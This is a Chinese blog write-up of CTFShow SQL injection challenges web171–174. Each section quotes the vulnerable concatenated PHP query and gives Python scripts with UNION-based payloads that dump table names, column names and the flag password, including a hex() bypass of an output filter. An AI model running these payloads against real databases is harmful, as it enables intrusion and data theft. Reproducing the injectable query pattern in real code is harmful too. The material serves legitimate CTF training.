CtfShow之SQL注入-持续更新

用户2616264

发布于 2023-05-18 11:32:39

3440

发布于 2023-05-18 11:32:39

文章被收录于专栏：penetration

CtfShow之SQL注入

web171

查询语句
//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

#无过滤的字符型注入。
import requests
url = "http://66e1d748-4475-4aa9-8c95-fb3737690e46.challenge.ctf.show/api/?id="
# 查数据库
tablename = "-1' union select 1,2,group_concat(table_name) from information_schema.tables  where table_schema=database() --+"
# 查列名
columnname = "-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+"
# 查数据
payload = "-1' union select id,username,password from ctfshow_user --+"
res = requests.get(url+payload)
print(res.text)

web172

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
if($row->username!=='flag'){
    $ret['msg']='查询成功';
}

#无过滤的字符型注入，添加了条件限制 username!='flag'
import requests
url = "http://669d6879-73f9-4a49-97ac-56ca927f63b2.challenge.ctf.show/api/v2.php?id="
tablename = "0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+"
columnname = "0' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' --+"
payload = "0' union select 1,(select password from ctfshow_user2 where username='flag') --+"
res = requests.get(url+payload)
print(res.text)

web173

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
过滤了字符类型的注入，添加了检查结果中是否匹配正则表达式/flag/i
使用hex函数绕过正则过滤

import requests
url = "http://8926a547-bbc7-4a5b-a20a-215fdc2c4037.challenge.ctf.show/api/v3.php?id="
tablename = "-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+"
columnname = "-1' union select 1,2,hex((select group_concat(column_name) from information_schema.columns where table_name = 'ctfshow_user3')) --+"
payload = "-1' union select 1,2,hex((select password from ctfshow_user3 where username='flag')) --+"
res = requests.get(url+payload)
print(res.text)

web174

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2022/10/19 ，如有侵权请联系 cloudcommunity@tencent.com 删除

sql